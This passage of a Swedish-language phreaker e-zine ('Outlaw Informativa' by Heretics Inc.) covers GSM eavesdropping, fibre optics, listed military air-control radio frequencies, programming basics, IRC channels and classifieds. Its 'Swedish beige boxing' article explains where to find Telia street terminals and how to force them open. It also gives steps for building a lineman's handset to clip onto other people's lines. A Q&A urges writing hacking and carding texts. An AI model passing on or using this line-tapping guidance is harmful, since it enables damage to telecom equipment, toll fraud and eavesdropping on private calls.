Vid Folk och Försvarskonferensen i Sälen gjorde Säpo-chefen Anders
Eriksson i går uttalanden om säkerheten i GSM. "Avslagna mobiltelefoner
bör lämnas utanför sammanträdesrum eftersom de kan användas för
avlyssning", hävdar Anders Eriksson.
Telias kommentar:
Om GSM-telefonen som används följer GSM - specifikation, har blivit
typtestad av ett certifierat testhus och inte är manipulerad är den inte
möjlig att använda för avlyssning.
Om mobiltelefonen har blivit manipulerad eller är felaktig kan detta
dock vara möjligt. Ansvaret för att se till att mobilerna håller rätt
kvalitet, överensstämmer med den typcertifiering som gjorts samt har en
konstruktion som motverkar manipulationer ligger på mobiltelefontillver-
karen.
En normal GSM-telefon går inte att använda för avlyssning.
Källa: www.telia.se
o----------------------------------------------------------------------o
¦[11] Fiberoptik för Newbies knash ¦
o----------------------------------------------------------------------o
Optik kablar andvänds vid tele kommunikation och överföring. Opto
kablarna andvänder ljus som informations skickare för en förökad
hastighet. För en överföring mellan elektronik till ljus behövs en E/O
omvandlare.
________________
E/O Omvandlare
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Sändare Mottagare
+----+ Optisk Fiber +----+
| ||¯¯¯¯¯|-----------------|¯¯¯¯¯|| |
| ||_____|-----------------|_____|| |
+----+ +----+
/\ /\
|| ||
|| ||
|| ||
Optisk Optisk
Sändare Mottagare
Det finns många olika fördelar med optofibersystem så som t.ex. låg vikt
,hög kapacitet, liten kabeldimension och långa avstånd till förstärkare.
En opto kabel består av en nypa olika lager av glasfiber. Glaset är
mycket rent, grymt rent faktiskt. Om det skulle kunna gå att se in i ett
fiber så skulle man kunna se flera mil. Genom kabeln skickas ett
infrarött ljus genom fibern, eventuellt genom plast vid kortare
överföringsavstånd.
Ett optiskt fiber består av 4 lager. Jag börjar med det yttersta lagret.
1. Sekundärskydd 1mm
2. Primärskydd 25 µm
3. Mantel 125 µm
4. Kärna 10 µm
Opto kabeln täcks av ett lager av stål eller plast som ger önskad
hållfasthet mot böjning. Kabeln innhåller även fyllnadsmaterial som
skyddar fibrerna mot böjning och väta.
OBS! Denna information är skrivet med egna ord men från en källa (nedan)
Om du vill veta mera om Optofiber så läs Att förstå telekommunikation 1.
Källa: Att förstå Tele Telekommunikation 1
o----------------------------------------------------------------------o
¦[12] Hemliga frekvenser crazy-train ¦
o----------------------------------------------------------------------o
Här har vi lite "hemliga" frekvenser för t.ex radioamatörer och sånt folk.
FLYGVAPNET STIDSLEDNING:
STRILBAND UHF(225-399,95 MHZ)
255.35
290.95
292.85 KANALKOD 423
290.80
290.90
270.80
346.70
276.80
281.10
276.35
273.70
296.10
STRILBAND VHF
142.45
143.45
141.10
134.80
138.25
134.90
126.15
138.10
134.20
135.20
138.80
140.10
132.30 KANALKOD 500
130.50
129.45
DIV SAMHORANDE FRKVENSER:
138.60 ALLM,MARIN.
143.65 KANALKOD 658
122.875(AM)
o----------------------------------------------------------------------o
¦[13] Svensk Beige Boxing TheClown ¦
o----------------------------------------------------------------------o
Inledning:
I denna artikel skall jag beskriva svensk beige-boxing på djupet.
Var hittar jag tele-terminaler som går att använda, hur kopplar jag in
mig på dem och vilka verktyg skall jag ha med mig när jag är ute och
"arbetar" på fältet. Denna artikel är främst skriven till "Heretics" men
eftersom jag numera startat en egen grupp så kommer vi att använda denna
ganska mycket. Hoppas att ifall du inte har en aning om hur svensk
Beige-boxing går till kommer att få upp ögonen för detta efter du läst
denna artikel.
Olika Tele-Terminaler:
Japanare:
Japanare är små gråa/vita rör med svart lock som telia så smart har
placerat ut lite varstans i vårt samhälle. De finns oftast vid täta
bostadsområden eller vid radhusområden. De finns oftast i närhet eller
brevid lyktstolpar eller elskåp.
Gråsuggor:
Små gråa skåp ca 20-25 cm breda som oftast hänger på lite äldre hyreshu-
s. Oftast hänger de på utsidan av huset, men det finns också de fall där
de hänger inne i trappuppgången. Dessa är inte lika enkla att ta sig in
i utan att föra en massa oväsen, men mer till hur det går till sedan.
Kottar:
Dessa små prylar har nog inte alla sett såvida ni inte har problem med
nacken eller vet att de finns..de är små vita eller gröna porslinsklock-
or som sitter längst upp i telefonstolpar. Enda kruxet när man skall
koppla in sig på dessa är att man måste vara en hejare på att klättra
eller kanske på yxan för att komma åt kotten.
Hur man tar sig in i teleterminalerna:
När man skall koppla in sig i dessa fungerar oftast det gamla hederliga
sättet: VÅLD! Eller några häftiga hammare eller avbitar-tängar som du
naturligtvis har i din lilla väska. Skall lista lite verktyg som kan
vara bra att ha med sig när man är ute på utflykt:
1st Lång vanlig skruvmejsel.
1st Liten vanlig skruvmejsel
1st Stjärnmejsel
1st Multikabeltång (bra att ha istället för en massa småtänger
Massa olika kablar av alla de slag (ifall vill vill förlänga osv)
Naturligtvis kan det vara bra att ha en LMHS (linemans handset) med sig
också för att du skall kunna göra något när du väl tagit dig in i
teleterminalen. Så här kommer en beskrivning på hur du skall bygga dig
en LMHS av bästa kvalite.
Linemans Handset:
De enda snygga LMHS jag har sett e de som telia självs gjort, men vad
kan man begära, vi gör ju våra hemma medans de får sina fabriks tillver-
kade. Men ifall man kämpar bra så kan man få sin egna LMHS riktigt
tjusig.Men lägg inte ned för mycket möda på dem, med tanke på att de kan
gå sönder väldigt lätt. Telefoner är inte till för att man skall använda
ute Ju.
Vad behöver du för att bygga en LMHS:
1 st telefon..helst en sådandär med knapparna i luren
2 st krokodilklämmor
1 st Lödtång (inte nödvändig, men det håller bättre)
Ta reda på var kabel X och X ligger i den telefon, brukar se ut så här:
--------------------------------
I TELEFONEN I
I I
I I
I I
I I
I I
I I
T T X X
T T T T
T T T T
T T T T
T T T T
T T T T
Klipp av telefon jacket och skala kabeln . Skala även kablarna X och
X och fäst krokodil klämmor på X och X. Sedan tar du och skruvar ihop
telefonen igen. Sedan har du en egen LMHS som du kan ut och testa.
Känner att jag inte skall skriva mer om svensk beigeboxing just nu utan
man kan väl se detta som en liten intruduktion till svensk beigeboxning.
Skriven av: TheClown
För: Heretics och UPOS
-
Knash noterar gärnet...
Kottar: de är små vita eller gröna porslinsklock-
or som sitter längst upp i telefonstolpar.
uhh...kottar är inte vita eller gröna, har sånna här och dom är svarta
och en aning större en en cola burk, jag har ju klättrat upp och koll-
at själv.
Det gamla hedliga sättet VÅLD !!!
Jag tvivlar på att man behöver andvända våld för att öppna en box, då
låter det så för jävligt.
Tack för bidraget, tänk på att hjälpa Mr Headache också med lite artik-
lar också eftersom han behöver hjälp med det.
o----------------------------------------------------------------------o
¦[14] Programstrukturer crazy-train ¦
o----------------------------------------------------------------------o
-sekvens (följd av programsatser, först sats 1, sedan sats, osv)
-selektion (val mellan två vägar i programmet, antingen Ja - satserna
eller Nej-satserna)
-iteration (upprepning av satser med olika vilkor)
Här kommer några exempel i programspråken COMAL, BASIC och Pascal
Programstruktur | COMAL (BASIC) | PASCAL
-----------------------------------------------------------------------
Val mellan två alt.| 100 IF x < 0 THEN | IF x < 0 THEN
Om (vilkor), så | 110 s:=s + x | s:=s + x
(Ja-satser) | 120 ELSE | ELSE BEGIN
annars | 130 y:=y + x | y:=y + 5
Nej-satser) | 140 x:=x + 5 | x:= x + 5
slut på valet | 150 ENDIF | END;
| (I BASIC skrivs IF-satsen på |
| en rad utan ENDIF) |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Upprepa så länge som| 100 WHILE t < 100 DO | WHILE t < 100 DO BEGIN
Så länge (vilkor) | 110 s:=s + t | s:=s + t
utför (satser) | 120 t:=t + 2 | t:=t + 2
slut på satsen | 130 ENDWHILE | END;
| (I BASIC vanligen utan DO |
| och med WEND som slut) |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Upprepa tills | 100 REPEAT | REPEAT
Upprepa | 110 x:=(x+a/x)/2 | x:=(x+a/x)/2
(satser) | 120 UNTIL ABS (x-a/x)<0.001 | UNTIL ABS (x-a/x)<0.001
tills (vilkor) | (I BASIC saknas vanligen |
| REPEAT-satsen |
| |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Upprepa ett bestämt | 100 FOR i:= 1 TO n DO | FOR i:=1 TO n DO BEGIN
antal gånger | 110 s:=s + x | s:=s + x;
Upprepa för | 120 x:=x + 1 | x:=x + 1
i=1, 2 ..., n | 130 NEXT i | END;
(satser) | (I BASIC utan DO) |
slut på upprepningen| |
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
-Arimetiska operatorer
De fyra vanliga arimetiska operatorerna skrivs + - * /
Upphöjt till skrivs i
COMAL (BASIC): a ^ x (eller ibland a ü x, a ** x)
PASCAL: EXP(LN(a)*x)
-Jämförelseoperatorer och logiska operatorer
I vilkorsuttrycken används jämförelseoperatorer och logiska operatorer.
________________________________________________________________________
Jämförelseoperator | Exempel | Betydelse
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
= | A = B | A är lika med B
< > | A < > B | A är inte lika med B
> | A > B | A är större än B
< | A < B | A är mindre än B
> = | A > = B | A är sötrre än eller lika med B
< = | A < = B | A är mindre än eller lika med B
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
________________________________________________________________________
Logisk operator | Exempel | Sant/Falskt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
AND (och) | (30 > 5*5) AND ( -7 < -5) | Sant
OR (eller) | (2*3 =5) OR (2*3=6) | Sant
NOT (inte) | NOT (3*333 < 1000) | Falskt
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Standardfunktioner
________________________________________________________________________
Funktion | COMAL (BASIC) | Pascal | Kommentar
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
sin x | SIN(X) | SIN(X) | X anges i radianer
cos x | COS(X) | COS(X) | X anges i radianer
tan x | TAN(X) | (saknas) | X anges i radianer
arctan x | ATN(X) | ARCTAN(X) | ger vinkeln i radianer
e^x | EXP(X) | EXP(X) |
ln | LOG(X) | LN(X) | X > 0
roten ur X | SQR(X) | SQRT(X) | OBS! Pascalbeteckningen
X^2 | (X*X, X ^ 2) | SQR(X) | kvadrera heltal (INTEGER)
ent x | INT(X) | INT(X) | heltalsdelen av X (REAL)
| | TRUNC(X) | heltalsdelen av X (INTEGER)
|x| | ABS(X) | ABS(X) | absolutbeloppet av X
| RND | RANDOM | slumptalsalstrare
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
o----------------------------------------------------------------------o
¦[15] Ett par IRCnet kanaler knash ¦
o----------------------------------------------------------------------o
Här kommer en liten lista med bra kanaler på IRCnet (?)
Server
irc.swipnet.se
Kanaler
#blackmetal.se
#vsp
#eject
#flug
#Linux
#Linux.se
#security
#Pyttemjuk
#ulug
#unix
#unix.se
#hacking
#phonesex
#fist
#hacknews
o----------------------------------------------------------------------o
¦[16] Köpes, Säljes och Sökes ¦
o----------------------------------------------------------------------o
Köpes:
1. Flashback tidningar köpes
pris dikuteras
nilssonmarcus@hotmail.com
2. Bärbar dator, fett med billig.
knash@linux.nu
Sökes
1. Information phf
knash@linux.nu
2. Danska, Norska och Finska Phreakers sökes.
maila knash@linux.nu
o----------------------------------------------------------------------o
¦[17] Frågor och kanske svar ¦
o----------------------------------------------------------------------o
Jag har starten en lite myshörna med frågor och svar, om d u har några
frågor eller vill svara på en fråga som står här så skickar du ett mail
till knash@linux.nu.
Hur blir man en framgångsrik grupp ? | Anonym
Svar: Börja med att fixa ett snyggt namn på gruppen och en hemsida med
mycket snygg design och även ett eZine är mycket uppskattat och
även det med ett mycket kewlt namn och snygg ascii design. Tänk
på när du, ni konstruerar zinet att ni har mera tekniskt informa-
tion en hummor och ironi. Typ 80% tekniskt 20% bullshit. Börja
skriva textfiler också om Hacking, Phreaking, Cracking, Carding
etc. Ett tips är att rippa telias manualer och skriva om dom med
egna ord, tänk dig en "AXE Växlar från Grunden" eller kanske tom.
"Avancerat information blad om AXE växlar" annars är det ju bara
att översätta Engelska "högklass" textfiler till svenska, t.ex.
Rainbow Books. Lycka till med allt.
//knash
o----------------------------------------------------------------------o
¦[18] Copyright ¦
o----------------------------------------------------------------------o
Jopp visst är det en lam Copyleft på detta eZine för att folk inte så
ändra en massa grejer i zinet, men seriöst "Who cares?" Om du lägger upp
zinet på din hemsid, underground cd eller någonstanns där du publicerar
den skicka genast ett mail till mig (knash@linux.nu) och tala om det.
Jag kommer att göra reklam för din hemsida i zinet då =)
Copyright (c) Heretics Inc. All right Servered
o----------------------------------------------------------------------o
¦[19] Prenumeration ¦
o----------------------------------------------------------------------o
Starta prenumeration
Skicka ett email till knash@linux.nu med subscribe OI i Subjekt rutan.
Avlsuta prenumeration
Skicka ett email till knash@linux.nu med unsubscribe OI i Subjekt ruta-
n.
o----------------------------------------------------------------------o
¦ ¦
o----------------------------------------------------------------------o
O U T L A W I N F O R M A T I V A
F R O M H E R E T I C S I N C .
W W W . H E R E T I C S . C J B . N E T
K N A S H @ L I N U X . N U